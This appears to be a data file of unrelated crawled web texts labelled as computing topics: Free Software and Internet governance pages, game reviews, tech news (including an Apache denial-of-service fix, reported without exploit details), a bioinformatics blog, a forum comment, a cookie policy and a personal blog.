knowledge, equal chances of accessing software and public education with regard to the principles outlined in the preamble. (2) The goals of the ``Chapter (Name of State)'' are namely to be achieved by: the ideal support of governmental and private organisations in all aspects of the Free Software, the cooperation and coordination with the FSF Europe, which pursues the same publicly-spirited goals, the support of programmers developing Free Software and so realizing the public | 计算机 |
2015-48/3681/en_head.json.gz/10928 | Internet Governance Forum (IGF)
As one outcome of the United Nations World Summit on the Information Society and
following up on its Working Group on Internet
Governance (WGIG), the November 2005 summit in Tunis decided to
establish the United Nations Internet Governance Forum (IGF).
It is important to understand that the IGF is not a decision-making
body, but has been established as a policy dialogue forum with strong
claims to multi-stakeholder involvement and participation. Its mandate
is set out in paragraph 72 of the Tunis Agenda of the WSIS:
72. We ask the UN Secretary-General, in an open and
inclusive process, to convene, by the second quarter of 2006, a
meeting of the new forum for multi-stakeholder policy dialogue --
called the Internet Governance Forum (IGF).The mandate of the Forum is
Discuss public policy issues related to key elements of
Internet governance in order to foster the sustainability, robustness,
security, stability and development of the Internet; Facilitate discourse between bodies dealing with
different cross-cutting international public policies regarding the
Internet and discuss issues that do not fall within the scope of any
existing body;
Interface with appropriate inter-governmental
organizations and other institutions on matters under their purview;
Facilitate the exchange of information and best
practices, and in this regard make full use of the expertise of the
academic, scientific and technical communities; Advise all stakeholders in proposing ways and means to
accelerate the availability and affordability of the Internet in the
developing world; Strengthen and enhance the engagement of stakeholders in
existing and/or future Internet governance mechanisms, particularly
those from developing countries; Identify emerging issues, bring them to the attention of
the relevant bodies and the general public, and, where appropriate,
make recommendations; Contribute to capacity building for Internet governance
in developing countries, drawing fully on local sources of knowledge
and expertise; Promote and assess, on an ongoing basis, the embodiment
of WSIS principles in Internet governance processes; Discuss, inter alia, issues relating to critical Internet
resources; Help to find solutions to the issues arising from the use
and misuse of the Internet, of particular concern to everyday users;
Publish its proceedings So it cannot make policy itself, but national and international
policies may follow from its work. But given that people are pushing
for the IGF to tackle issues such as Spam, Cybercrime, Copyrights,
Patents, Trademarks and such, following the IGF makes sure that the
Free Software community will not be surprised by policies that would
contribute to monopolisation of the internet, and to maintain the
freedom of users, developers and companies on the internet.
The Internet Governance Forum is a yearly meeting, held in
different countries, and open to participation by governments, private
sector and civil society.
2006: The Inaugural Meeting of the IGF has taken place in Athens, Greece on 30 October - 2 November.
2007: The 2007 IGF will be held in Rio de Janeiro, Brazil
Dynamic Coalitions
Most of the substantial discussion at the IGF takes place in the
Dynamic Coalitions, which are formed ad-hoc at the IGF, and work in an
open multi-stakeholder approach. These are the Dynamic Coalitions that
FSFE is involved in:
Dynamic Coalition on Open Standards
Dynamic Coalition on Access to Knowledge (A2K) and Freedom of Expression
Sovereign Software: Open Standards, Free
Software, and the InternetFSFE contribution by its
president Georg Greve to the first meeting of the Internet Governance
Official web site of the IGF:
http://www.intgovforum.org
$Date: 2012-07-20 17:27:45 +0200 (Fri, 20 Jul 2012) $ $Author: samtuke $ | 计算机 |
2015-48/3681/en_head.json.gz/10979 | Points and Counterpoints on The Secret World
So the big Celebration Weekend is over. A lot of people who hadn't had a chance to sample The Secret World got their chance, and while not everyone was satisfied, I'm sure Funcom picked quite a few new acolytes. Kadomi gushes enthusiastically about the game, the themes appealed to her: Lovecraftian horror, LGBT-friendly (I would say neutral, or matter-of-fact). She concludes with this:
I have to say, this was the first MMO since WoW that totally made me forget the time. When my SO told me it was time to do groceries after I sat down to play it at noon, and it was miraculously 6 pm, I was boggling.
Psynister and Fynralyl were, shall we say, less enthusiastic. They bring up valid points, but much of their concern is over stylistic choices made by the Ragnar Tornquist and his team rather than (what I perceive as) flaws in the game itself. Since that is a matter of taste, there is not too much I could say that would change their minds. And that is perfectly OK. The Secret World is not a game for everyone, just the setting—our own modern world, with supernatural horrors—is a turn-off for many, and that is before you even get into the mechanics of the game.
Dark and Profane
Fyn, in particular was not fond of the dark "hyper-realistic" art style of the game. I put that in quotes because while I think that was the goal, we all have a long way to go before fully interactive video games can have the realism of Hollywood CGI. I've mentioned it before, but the uncanny valley that many of the characters live in just adds to the creepiness of the game for me. That said, I myself am looking forward to spending time in the far more pleasant climes of Guild Wars 2.
The lack of PC interaction in the cutscenes was also mentioned, something particularly noticeable to someone coming directly from SWTOR's conversation wheels. In TSW, the NPCs actually make mention of the PC's reticence. I personally feel this frees me up for RP. My Templar is German; my Iluminata, Texan; and my Dragon, Japanese. The addition of whatever voices the devs decided to use would force me to alter my conception of these characters. Perhaps not as big a deal in SWTOR, though eventually the spoken dialogue of my characters there becomes grating sometimes, when they don't say exactly what I thought they should say. So it's a stylistic choice some people will like and others won't.
The prominent profanity laced through the game is a major turn-off for many. Both Psyn and Fyn found it not only gratuitous, but Fyn said, "It also reminded me of a kid trying too hard to be 'cool'." This is an honest critique; unfortunately, the use of profanity is more widespread than some would like in the Real World, too. Sad to say, I work in a environment where that sort of language is common. I am guilty of using it myself, because it is pervasive. Sctrz doesn't like it at all, she skipped through the junkman's cutscenes completely.
Creation and Progression
Fyn also didn't like the limitation of three character slots per account. Actually, she referred to this issue as her deal breaker. [EDIT] Extra slots are available from you account page on the TSW website. Details below, thanks to Eric[/EDIT] Fyn realized that there was a slot for each faction, and with every character capable of learning every skill and ability eventually, that may be all that's necessary for most people. But she likes to play alts in order to relax at different levels of the game, so for her three slots simply isn't enough. I am playing three alts and therefore repeating a fair amount of content, as well as progressing more slowly through it than Belghast, MMO Gamer Chick, and others. I don't need to play more, because of the classless thing; and you can see from my character pages, Dear Reader, that I am normally an unrepentant altoholic.
Both Fyn and Psyn had issues with the no-levels aspect of the game. Psyn really hit the nail on the head with his section title "Leveling Without Levels." Let's put a stop to the lie that there isn't character stat progression in TSW. As Psyn correctly pointed out, if there were no levels in the game, a newbie straight out of the tutorial should be able to walk into Transylvania (the last zone of zones) and have a decent chance of survival. This is not the case. What TSW doesn't have is discreet levels and a specific signal (The GLOW) that says, "You are now better/stronger/faster than a second ago."
Character progression in terms of stats is done through the purchase of Skills. Since you can spend Skill points however you choose, there is plenty of room to screw it up. Fyn mentioned that she didn't like having to devote skill points to talisman skills in order to wear higher quality talismans. She wanted to spend them all on weapons. What she may not have realized is that the Talisman Skills are also where you improve your characters' basic hit points, as well as their resistance to physical and magical damage. Also, each weapon has two skill paths, but it only necessary to fill in one path to wield higher quality weapons. On my toons, I have taken to filling all the talismans and the two weapons I wield in a balanced way: the Major Talisman Skill first as it boosts HP, then the weapons, and finally the other talismans. But there's nothing that says you have to do this.
In a related vein, Psyn and Fyn both disliked the inability to easily see the relative strength of their opponents; however as was pointed out in a comment on Psyn's review, the mobs do have an indicator of their strength, it's just not a number. I personally look at the mob's HP and make a judgement call on whether I think I can whittle it down before I am dead myself. I do get in over my head.
Neither Here Nor There
The questing system of The Secret World is designed to slow you down to "savor" each quest as you're doing it, limiting your current list to one phase of the overarching story, one main/investigation/sabotage quest, one "dungeon" quest, and three side quests. Attempting to pick up any further quests will result in pausing the current quest of that type (or one of the three). You can't run around and pick up all the quests. Part of the reason for this is that many of the quests, even the side ones, involve a bit of thought, and maybe some research on the internet.
TSW has a built in web browser to assist in these quests. Neither Fyn nor Psyn mentioned the need for outside research in their reviews, but it's something I've noticed others saying. This is a love-or-hate aspect of the game. TSW is almost an Alternate Reality Game, and as such, the devs have peppered the internet with sites and pages that help with the quests, or at the very least, they have researched commonly used sites like Wikipedia to help build their mysteries. And this is beyond the thorough research they did on the environment itself.
I also can't speak to the complaint that the quests send you all over the map, since I neither saw the paths that Psyn and Fyn took, nor can I gauge their tolerance levels for wandering. I personally don't think there's too much, the quests I pick up seem to flow fairly well together, and I make note of where things are so I can return when my current task is done. This is ultimately another matter of taste.
The story of what is going on in The Secret World starts with the videos you encounter at the very beginning of the character creation process. Psynister decided to skip the videos since he was going to role one of each faction anyway. This is the first time I'll actually say he made a mistake. Those videos, and the quest cutscenes, and the conversations with main NPCs, are integral to understanding what is going on here. Psyn goes further in saying, "I don’t think they did a very good job of actually telling you what the story is." I feel the information is there, but you have to seek it out.
There are two ways of telling a mystery story. One is to let the audience know who the perpetrator of the crime is right off the bat, and then let them follow the investigators as they unravel the mystery. The other is to leave the audience in the dark, as well, allowing them to figure out the mystery. The Secret World is of the second type. You don't start out with a ton of information other than what's given to you through the dialogue. As you progress through the quests, you find out more about not only the main mystery, but the secret world in general. I actually found this very similar to playing vanilla WoW so many years ago, not there is a ton of mystery in WoW, but there is a rich world to discover.
A Swing and a Miss
Psynister would also like more the capabilities of the different weapon types spelled out. Now, when you first open both Skills and Abilities a video automatically starts playing which explains the basics. These abilities are accessible at any time from the help button in their respective interfaces. The only thing I can say to beyond that is The Secret World refuses to hold your hand. Prepare to be challenged. The specifications of every ability in the game is available from the Ability Wheel interface, including suggested decks that mention their purpose or role in a group: Tank, DPS, or Healer. The Skill paths for each weapon are also based on the potential role of that weapon. For example, Blood has both a healing path and a DPS path. But you have to look at the interface to see it. I can't remember everything it says, but I am curious, since Psyn skipped the faction videos, did he also skip the Skill and Ability tutorials?
I can understand the eagerness to just get the game going already, and I think Guild Wars 2 is a great example of getting you involved in gameplay right away, progression details can come later. TSW doesn't, other than the quick subway disaster tutorial. And even then, I can see how it may give a mistaken impression of the shotgun abilities. However, I am a strong fan of so-called exploratory learning. I am far more adept with Windows and MS Office than the vast majority of my coworkers, simply because I either have played around with the programs so much, or am willing to go to the help file to find a solution to an issue. I found TSW to be the same way. I can explore both the world environment and the UI to my heart's content. For those of you still reading and interested in playing I highly recommend this Deck Builder.
TL;DR: Different Strokes
Only so many character slots, only so many quests at a time, only so many active and passive abilities in any given fight. Using limitations, TSW forces you to focus and plan. Take the time to really look around and listen to the NPCs. Explore your Abilities to figure what goes best with what based on your own playstyle. Explore the world both for XP and to find Lore objects. I've "wasted" several hours on my characters just exploring the safe Faction capitals looking for Lore. I loved it.
Neither Psyn nor Fyn are dummies. On the contrary, they are both intelligent, thoughtful people, with whom I am glad to share an online friendship, which I hope continues after this post. :) Their posts are insightful impressions of TSW for people coming to the game "blind." I'm sorry I wasn't available to answer questions they had during gameplay; recommending healing weapons, for instance. Ultimately, it would not have made much difference. Stylistically, the game is not their cuppa tea. This game serves a niche, much like EVE. It's not for everyone, but I am glad people have had a chance to play and decide for themselves whether the game is for them. Hey guys, I'll see you in GW2!
Funcom,
Game Mechanics,
MMOs,
Impressions? 20 comments: | 计算机 |
2015-48/3681/en_head.json.gz/11107 | Barbara Liskov wins Turing award
Professor Liskov is the second woman to be awarded the prize
The 2009 A. M. Turing Award has gone to Barbara Liskov for her contributions to programming.
Professor Liskov was the first US woman to be awarded a PhD in computing, and her innovations can be found in every modern programming language.
She currently heads the Programming Methodology Group at the Massachusetts Institute of Technology.
The award, often referred to as the "Nobel Prize for computing", includes a $250,000 (�180,000) purse.
Professor Liskov's design innovations have, over the decades, made software more reliable and easier to maintain.
She has invented two computer progamming languages: CLU, a forerunner of modern object-oriented ones and Argus, a distributed programming language.
Liskov's groundbreaking research underpins virtually every modern computer application, forming the basis of modern programming languages such as Java, C# and C++.
One of the biggest impacts of her work came from her contributions to the use of data abstraction, a method for organising complex programs.
The prize, named after British mathematician Alan Turing, is awarded annually by the Association for Computing Machinery.
ACM president Professor Dame Wendy Hall said of Liskov: "Her elegant solutions have enriched the research community, but they have also had a practical effect as well.
"They have led to the design and construction of real products that are more reliable than were believed practical not long ago," she added.
Professor Liskov will be presented with the award in June.
Alan Turing: Father of the computer
29 Apr 99 | UK News
Computers get chattier
18 Mar 99 | Set99
Test explores if robots can think
13 Oct 08 | Berkshire
Turing Award
TOP TECHNOLOGY STORIES
Bing gains market share in search
'Virtual human' makes Xbox debut | 计算机 |
2015-48/3681/en_head.json.gz/11843 | Another Apache update due to byte range flaw The Apache Foundation has announced that the newly released version 2.2.21 of its free web server is essentially a bug fix and security release. In particular, the developers focused on the vulnerability that makes servers susceptible to Denial-of-Service (DoS) attacks. The new version corrects and complements the first fix, which was released only two weeks ago. It corrects an incompatibility with the HTTP definition and changes the interpretation of the MaxRange directive. It also fixes flaws in mod_proxy_ajp, a module that provides support for the Apache JServ protocol. Users are advised to update their Apache installations as soon as possible. However, those who use Apache 2.0 will still need to wait: corrections for this version are scheduled to be incorporated in the release of version 2.0.65 in the near future. Those who use version 1.3 are not affected by the byte range bug. The Apache developers explain the background of the byte range vulnerability in an online document. There, they also describe various options for protecting servers against DoS attacks that exploit this vulnerability. The document also mentions a ticket on the byte range topic issued by the IETF, which is responsible for the HTTP standard. In this document, the IETF says that the protocol itself is vulnerable to DoS attacks, because of, for instance, the potential presence of many small or overlapping byte range requests. Changes to RFC 2616 are planned in order to correct this. The IETF stipulates that clients must no longer send overlapping byte ranges, and that servers may coalesce such overlapping ranges into a single range. Ranges within a request must be separated by a gap that is greater than 80 bytes, and they must be listed in ascending order, said the IETF.
(djwm) | 计算机 |
2015-48/3681/en_head.json.gz/12306 | E3: Updated Shadowbane Information
At a demonstration of Shadowbane at the Ubi Soft booth, some new information about the game was revealed.For starters, a release this year will definately be happening - either during Q3 or Q4. No summer release will occur, but Wolfpack and Ubi have re-opened signups for the Shadowbane open beta test, to begin at the end of June.The current goal is to have between 2000 and 2500 players logged onto each server at one time. One core design facet - the ability to travel between servers - is still being discussed, though it strongly hoped that it will be in the game at some point. Wolfpack also performed a slight graphical upgrade in time for the show, and all core graphical effects, with the exception of lighting effects, are currently in the E3 build. The story was also a major focus, and it was mentioned that it is hoped that different servers will be able to shape the ongoing storyline in different ways to accomodate the actions of the players. It is also hoped that Shadowbane's developers will be dramatically altering the face of the game as it progresses - one example given was the total destruction of a particular class, preventing any new characters of that class from being created. In such a case, the existing characters would be the only remnants of that class, and it would be possible to be the last character of that type.More information about Shadowbane will be posted in the future, but Wolfpack has major plans for the game, and it will be interesting to see how well they can pull it off.
Official Shadowbane Website
Updated:05.23.02 - 7:46 PM
Tortolia | 计算机 |
2015-48/3681/en_head.json.gz/12422 | Why are Vista updates not on Windows Update?
Operating systems Enhancements are available for download elsewhere
Shares We reported on the reluctant emergence of new updates to improve the stability and reliability of Windows Vista yesterday. But what we didn't realise was that the updates don't appear to feature on the Windows Update website. Nor are they automatically downloading to users' machines.The updates haven't been officially announced by Microsoft. There hasn't even been any comment about them on the Windows Vista Team Blog. And usually the slightest squeak of activity is trumpeted there. Article continues below
Web speculation has suggested the updates could have been made available in advance of Microsoft's regular monthly patch release date, Patch Tuesday. This is slated for next week. It's unlikely the updates are anything to do with Windows Vista Service Pack 1 which will rear its head before the end of the year. "There will be a Windows Vista Service pack but it's too early to discuss specifics on timing," said a Microsoft spokesperson last month. "The team is working hard on the service pack, and our current expectation is that a Beta will be made available sometime this year." | 计算机 |
2015-48/3681/en_head.json.gz/13829 | Thanks for visiting my blog - I have now moved to a new location at Nature Networks. Url: http://blogs.nature.com/fejes - Please come visit my blog there.
new repository of second generation software
I finally have a good resource for locating second gen (next gen) sequencing analysis software. For a long time, people have just been collecting it on a single thread in the bioinformatics section of the SeqAnswers.com forum, however, the brilliant people at SeqAnswers have spawned off a wiki for it, with an easy to use form. I highly recommend you check it out, and possibly even add your own package.http://seqanswers.com/wiki/SEQanswersLabels: Algorithms, Aligners, application development, assembly, Bioinformatics, Chip-Seq, documentation, new technology, programming, Sequencing, short-reads, SNP calling, Software
posted by Anthony Fejes at 8/18/2009 03:30:00 PM 0 Comments
Complete Genomics, part 2
Ok, I couldn't resist - I visited the Complete genomics "open house" today... twice. As a big fan of start up companies, and an avid follower of the 2nd gen (and possibly now 3rd gen) sequencing, it's not every day that I get the chance to talk to the people who are working on the bleeding edge of the field.After yesterday's talk, where I missed the first half of the technology that Complete Genomics is working on, I had a LOT of questions, and a significant amount of doubt about how things would play out with their business model. In fact, I would say I didn't understand either particularly well. The technology itself is interesting, mainly because of the completely different approach to generating long reads... which also explains the business model, in some respects. Instead of developing a better way to "skin the cat", as they say, they went with a strategy where the idea is to tag and assemble short reads. That is to say, their read size for an individual read is in the range of a 36-mer, but it's really irrelevant, because they can figure out which sequences are contiguous. (At least, as I understood the technology.) Ok, so high reliability short reads with an ability to align using various clues is a neat concept.If you're wondering why that explains their business model, it's because I think that the technique is a much more difficult pipeline to implement than any of the other sequencing suppliers demand. Of course, I'm sure that's not the only reason - the reason why they'll be competitive is the low cost of the technology, which only happens when they do all the sequencing for you. If they had to box reagents and ship it out, I can't imagine that it would be more significantly cheaper than any of the other setups, and probably much more difficult to work with. That said, I imagine that in their hands, the technology can do some pretty amazing things. I'm very impressed with the concept of phasing whole chromosomes (they're not there yet, but eventually they will be, I'm sure), and the nifty way they're using a hybridization based technique to do their sequencing. Unlike the SOLiD, it's based on longer fragments, which answers some of the (really geeky, but probably uninformed) thermal questions that I had always wondered about with the SOLiD platform. (Have you ever calculated the binding energy of a 2-mer? It's less than room temperature). Of course the cell manages to incorporate single bases (as does Pacific Biosciences), but that uses a different mechanism.Just to wrap up the technology, someone left an anonymous comment the other day that they need a good ligase, and I checked into that. Actually, they really don't need one. They don't use an extension based method, which is really the advantage (and achilles heel of the method), which means they get highly reliable reads (and VERY short fragments, which they have to then process back to their 36-to 40-ish-mers). Alright, so just to touch on the last point of their business model, I was extremely skeptical when I heard they were going to only sequence human genomes, which is a byproduct of their scale/cost model approach. To me, this meant that any of the large sequencing centres would probably not become customers - they'll be forced to do their own sequencing anyhow for other species, so why would they treat humans any differently? What about cell lines, are they human enough?... Which left, in my mind, hospitals. Hospitals, I could see buying into this - whoever supplies the best and least expensive medical diagnostics kit will obviously win this game and get their services, but that wouldn't be enough to make this a google-sized or even Microsoft-sized company. But, it would probably be enough to make them a respected company like MDS metro or other medical service providers. Will their investors be happy with that... I have no idea. On the other hand, I forgot pharma. If drug companies start moving this way, it could be a very large segment of their business. (Again, if it's inexpensive enough.) Think of all the medical trials, disease discovery and drug discovery programs... and then I can start seeing this taking off. Will researchers ever buy in? That, I don't know. I certainly don't see a genome science centre relinquishing control over their in house technology, much like asking Microsoft to outsource it's IT division. Plausible... but I wouldn't count on it.So, in the end, all I can say is that I'm looking forward to seeing where this is going... All I can say is that I don't see this concept disappearing any time soon, and that, as it stands, there's room for more competition in the sequencing field. The next round of consolidation isn't due for another two years or so. So... Good luck! May the "best" sequencer win.Labels: Corporate Profile, new technology
posted by Anthony Fejes at 2/06/2009 09:55:00 AM 0 Comments
Knols
A strange title, no?I just discovered Google's Knol project. Imagine an author-accountable version of Wikipedia. That's quite the concept. It's like a free encyclopedia, written by experts, where the experts make money by putting google adds on their pages (optional), and the encyclopedia itself is free. I can't help but liking this concept.This, to me, is about the influence of Open Source on business models other than software. People used to claim, back in the 90's, that the internet would eventually become nothing but adds, because no one in their right might will contribute content for free, and content generation would become the exclusive domain of major companies. That was the old thinking, which led to the "subscription models" favoured by companies like online subscription based dictionaries, and subscription based expert advice, both of which I find lacking in so many respects.Subsequently, people began to shift in the other direction, where it was assumed that services could harness the vast power of the millions of online people. If each one contributed something to wikipedia, we'd have a mighty resource. Of course, they forgot the chaotic nature of society. There are always a bunch of idiots to ruin every party.So where does this leave us? With Knol! This model is vastly more like the way software is created in the Open Source model. The Linux kernel is edited by thousands of people, creating an excellent software platform, and it's not by letting just anyone edit the software. Many people create suggestions for new patches, and the best (or most useful, or most easily maintained...) are accepted. Everyone is accountable along the way, and the source of every patch is recorded. If you want to add something to the Linux kernel, you'd better know your stuff, and be able to demonstrate you do. I think the same thing goes for knol. If you want to create a page, fine, but you'll be accountable for it, and your identity will be used to judge the validity of the page. If an anonymous person wants to edit it, great, that's not a problem, but the page maintainer will have to agree to those changes. This is a decentralized expert based system, fueled by volunteers and self-sponsored (via the google adds) content providers. It's a fantastic starting point for a new type of business model.Anyhow, I have concerns about this model, as I would about any new product. What if someone hijacks a page or "squats" on it. I could register the page for "coca cola" and write an article on it and become the de-facto expert on something that has commercial value. ouch.That said, I started my first knol article on ChIP-Seq. If anyone is interested in joining in, let me know. There's always room for collaboration on this project.Cheers!Labels: new technology
Synthetic genomes
A nifty announcement this morning pre-empted my transcriptome post:Scientists at the J. Craig Venter Institute have succeeded in creating a fully synthetic bacterial genome, which they have named Mycoplasma genitalium JCVI-1.0. This DNA structure is the largest man-made molecule in existence, measuring 582,970 base pairs.Kind of neat, really. Unfortunately, I think it's putting the cart before the horse. We don't understand 95% of what's actually going on in the genome, so making an artificial genome is more like having a Finnish person making a copy of the English dictionary by leaving out random words (just one or two), and then seeing if Englishmen can still have a decent conversation with what he's left them. When he finds that leaving out two words still results in a reasonable discussion on toothpaste, he declares he's created a new Dialect.Still, it's an engineering feat to build a genome from scratch, much like the UBC engineers hanging VW bugs off of bridges. Pointless and incomprehensible, but neat.Labels: new technology
Pacific Biotech new sequencing technology
I have some breaking news. I doubt I'm the first to blog this, but I find it absolutely amazing, so I had to share.Steve Turner from Pacific Biosciences (PacBio), just gave the final talk of the AGBT session, and it was damn impressive. They have a completely new method of doing sequencing that uses DNA polymerase as a sequencing engine. Most impressively, they've completed their proof of concept, and they presented data from it in the session.The method is called Single Molecule Real Time (SMRT) sequencing. It's capable of producing 5000-25,000 base pair reads, at a rate of 10 bases/second. (They apparently have 25bps techniques in development, and expect to release when they have 50bps working!) The machinery has zero moving part, and once everything is in place, they anticipate that they'll have a sequencing rate of greater than 100 Gb per hour! As they are proud to mention, that's about a full draft genome for a human being in 15 minutes, and at a cost of about $100. Holy crap!Labels: Bioinformatics, new technology, Pacific Biosciences, Sequencing, SMRT
Name: Anthony Fejes Location: Vancouver, British Columbia, Canada View my complete profile
Anthony's new blog can be found at http://blogs.nature.com/fejes
While writing this blog, Anthony was a PhD Candidate at the University of British Columbia working at the BC Cancer Agency's Genome Sciences Centre. His area of interest is in second generation sequencing applications and bioinformatics algorithm development.
On fejes.ca:
My Blog Homepage
My resume (pdf)
454 based pathway mapping
ChIP-Seq/Transcriptome
Breast Cancer Sequencing
FindPeaks 4.0 - RNA-Seq
FindPeaks
Genetic Future
MassGenomics
PolITiGenomics
Genetic Interference
Jason Stajich
Jonathan A. Eisen
nodalpoint.org
Public Rambling
What you're doing is rather desperate
YOKOFAKUN
Youngfemalescientist
Omics! Omics!
SEQanswers
Canucks.com
Canuck's Corner
NHL at TSN
Comics & Humour
GPF
Herd Thinners
NCBI-ROFL
Grandmaison
Kent Bovin
Marc Adamus
cpbills
techgirl
Rob Girard
Wolfram Alpha recreates ensembl?
Link to all my AGBT 2010 Notes.
AGBT wrap up.
Complete Genomics, Revisited (Feb 2010)
AGBT 2010 - Illumina Workshop
AGBT 2010 - Complete Genomics Workshop
AGBT 2010 - Yardena Samuels - NHGRI
AGBT 2010 - Joseph Puglisi - Stanford University S... | 计算机 |
2015-48/3681/en_head.json.gz/14289 | Contact Advertise Thoughts on 'MinWin', Windows 7, and Virtualisation
Linked by Thom Holwerda on Mon 22nd Oct 2007 13:48 UTC Earlier today, OSNews ran a story on a presentation held by Microsoft's Eric Traut, the man responsible for the 200 or so kernel and virtualisation engineers working at the company. Eric Traut is also the man who wrote the binary translation engine for in the earlier PowerPC versions of VirtualPC (interestingly, this engine is now used to run XBox 1 [x86] games on the XBox 360 [PowerPC]) - in other words, he knows what he is talking about when it comes to kernel engineering and virtualisation. His presentation was a very interesting thing to watch, and it offered a little bit more insight into Windows 7, the codename for the successor to Windows Vista, planned for 2010.
1 · Read More · 72 Comment(s) http://osne.ws/eic Permalink for comment 279845
RE: This isnt new by TemporalBeing on Mon 22nd Oct 2007 15:40 UTC in reply to "This isnt new" Member since:
Windows isnt dead it just needs a major garbage cleaning, you don't throw out code that works XP was one of the best OS's in history especially since SP2. The XP code-based seemed to work. It was really a delinquent code base that really needs a lot of work, and a lot of legacy crap dropped from it. The author has a good approach for how to do so while still maintaining the backwards compatibility, and it would behoove Microsoft to actually do it. As to throwing out a code base - yes, there are times when you do throw out a code base. Typically, it is when you can no longer control the code. Sure, you might be using CVS or SVN or something similar, but that doesn't mean you can truly 100% control the code. For instance, I worked on one project where the code base was really uncontrollable. It had a legacy history to it and we couldn't solve the problems it had by continuing to use that code base. The only answer was to start a fresh - use new practices so that we could manage the resources of the code, ensure security, etc. The old code base, while it worked, wouldn't have supported those efforts. Moreover, the new code base allowed us to add in new features quickly, easily, and maintainably. (When we fixed or added a new feature was added to the old code base, we would end up with more issues coming out than we went in with. It was really bad.) The Windows code base is likely at that point. It was likely there before XP, and only made worse by XP. It's easy to tell when you're at that point as every new change takes longer to get in and keep the old code functional. So yes, it's high time Microsoft cut the cruft and started a new code base, and designed the code base to be more modular, maintainable, secure, etc. It's the only way the software will survive another generation (e.g. Windows 7 and Windows 8). Otherwise, it will collapse under its own weight. | 计算机 |
2015-48/3681/en_head.json.gz/14339 | Help Smilies
This page discusses how cookies are used by this site. If you continue to use this site, you are consenting to our use of cookies.
What Cookies Are
Cookies are small files stored on your computer by your web browser (such as Internet Explorer or Firefox) at the request of a site you're viewing. This allows the site you're viewing to remember things about you, such as your preferences and history or to keep you logged in.
Cookies may be stored on your computer for a short time (such as only while your browser is open) or for an extended period of time, even years. Cookies not set by this site will not be accessible to us.
Our Cookie Usage
This site uses cookies for numerous things, including:
Registration and maintaining your preferences. This includes ensuring that you can stay logged in and keeping the site in the language or appearance that you requested.
Analytics. This allows us to determine how people are using the site and improve it.
Advertising cookies (possibly third-party). If this site displays advertising, cookies may be set by the advertisers to determine who has viewed an ad or similar things. These cookies may be set by third parties, in which case this site has no ability to read or write these cookies.
Other third-party cookies for things like Facebook or Twitter sharing. These cookies will generally be set by the third-party independently, so this site will have no ability to access them.
Removing/Disabling Cookies
Managing your cookies and cookie preferences must be done from within your browser's options/preferences. Here is a list of guides on how to do this for popular browser software: | 计算机 |
2015-48/3681/en_head.json.gz/14753 | Constantin's Blooog
Useful stuff for your blog-reading pleasure.
7 Things You May (or May Not) Know About Me
By user13366078 on Jan 23, 2009
I recently got hit by a blogger virus Ponzi scheme meme tradition where you get to write about yourself while blaming others for it (thanks, Tim!). Well, I haven't blogged much about myself and I still owe you, dear reader, an "About me" article, but this blog is meant to be useful, not self-serving so you'll have to do with these seven pieces of useless information for now. I used to be a nomad as a kid. My mom worked for the German department of foreign affairs which usually meant that every 4 years or so we would move to a different country. That's why she met my dad in Santiago de Chile and so the secret of my not so German last name "Gonzalez" is finally revealed. Despite all of that, I was born in Bonn, the former capital of Germany, we moved to Switzerland for a bit, I spent my kindergarten years in Bogotá (Colombia) (my brother was born there in 1975 and he can claim Columbian nationality by birthright, cool). I actually picked up Spanish as my first language with only little German (everybody including the TV was speaking Spanish so why should I have listened to my Mom?). From there we moved to Istanbul (Turkey) where I finally learned German (yep, there's a German school there) but halfway through the term, there was a minor terrorist bomb attack on my elementary school (I hardly noticed, really) so my parents had enough of foreign countries for a while and we moved back to Bonn around 1978. I spent most of my school time in Germany until we moved to Rome (Italy) after grade 9 (1986-ish). After finishing school, I went to Clausthal (Germany) (yes, quite a culture shock) to study computer-science while my parents and my brother continued to Lisbon (Portugal), Bonn (Germany, again), then Barcelona (Spain). Now I've been living in Munich for more than 10 years, so I call this "home" at the moment. My wife and I spent our honeymoon in Chile, exploring my roots and I'm sure I'll go there again, someday... As a student, I was CEO of a pub for a year. The pub is called the "Kellerclub" and it still exists :). You know how it goes: Your favourite student pub is actually a nonprofit organization for tax purposes so we could serve beer at the lowest prices in town. Any nonprofit needs to have a board of directors of at least three people and that night in, hmm 1992?, anyway, that night when they had to elect a new board, I volunteered together with two others and strangely noone else volunteered so the three of us got to run the pub for a year (in Germany, a nonprofit board has to have at least three members). While the other two members had to deal with financial bookeeping, booking the bands, etc., I mostly had to deal with legal issues (we got exorbitant high fees for social security for all the bands we booked over the last 5 years to deal with), fundraising (we needed new speakers) and trying to keep the bartenders under control so they don't drink more than they earn or close later than the police would let us. Oh, and keeping the school kids out of the club was always an issue, too... But it was fun and we learned more about real life than what the university could have taught us, especially during night after night of bartendering with all kinds of weird guests. Tim blogged about playing around with mod files in his "7 things" entry, which reminds me of the good old homecomputer times. My first computer was a Dragon 32 which turned out to be a clone of the Radio Shack TRS 80 Color Computer. Back then, it wasn't as popular as the Commodore 64, but it had the better OS (read: More commands in its Basic interpreter). That didn't count much, because the C64 had the better games so I upgraded to a Commodore 128d after a few years. Those were the golden times of the SID sound chip and my friends and I spent hours, days, weeks and months listening to cool video game music (and of course playing those videogames, too) and watching breathtaking demos from the demoscene. Back then, you could know everything about your computer, including machine language, hardware registers (there were no "drivers" back then :) ) and the full specs (and undocumented features) of all of the chips inside your computer. I'd loved to program my own music, but somehow my musical talents were limited, and so I spent my time ripping music from games and figuring out how they worked. Then, the Amiga came and I earned my Amiga 500 by teaching my mom's staff how to use a word processor (they shipped PCs with Microsoft Word to the embassy where she worked, but did only one week of training for everything to a staff that never saw a computer before). The Amiga beat the PC world hands down in every category of coolness from audio to graphics to operating system features (multitasking, baby!) for years and of course its sound capabilities were more advanced (it had a real multi-channel sample player), but the SID had that analog touch that the digital world never could quite replicate that well back then. Just when the Amiga times were over (I owned an Amiga 4000 running NetBSD) and the PC won, I was saved from having to buy my first PC by deciding to play on a Sony Playstation console and working on an Apple Newton instead, which both outclocked all the PCs in my neighborhood by a wide margin :). I still want to create music, but hardly find the time. I've played around with keyboards, but mostly preferred programming music using several software tools, such as Logic Pro. My biggest achievement so far is the intro music to the HELDENFunk podcast which I help create on a regular basis. It's not much, but at it doesn't seem to be bad either. At least noone has decided to replace it with a better tune yet :). I secretly wanted to become a drummer when I went to university, an ambition that was unexpectedly reignited during CEC 2008 when Glenn, Bob (?), Ted and I founded "They call me Ted" while playing Rockband in between CEC lectures. Our "band" reached the CEC 2008 highscore. We didn't win the final round (because none of us knew the song we were supposed to play), but we'll be back in 2009 and I'm now playing drums in Guitar Hero World Tour whenever I find the time as a practice. Back to real music: I'll start playing with Logic Pro again, this time trying to create a full song. And then there's the Korg Kaossilator which seems to be really 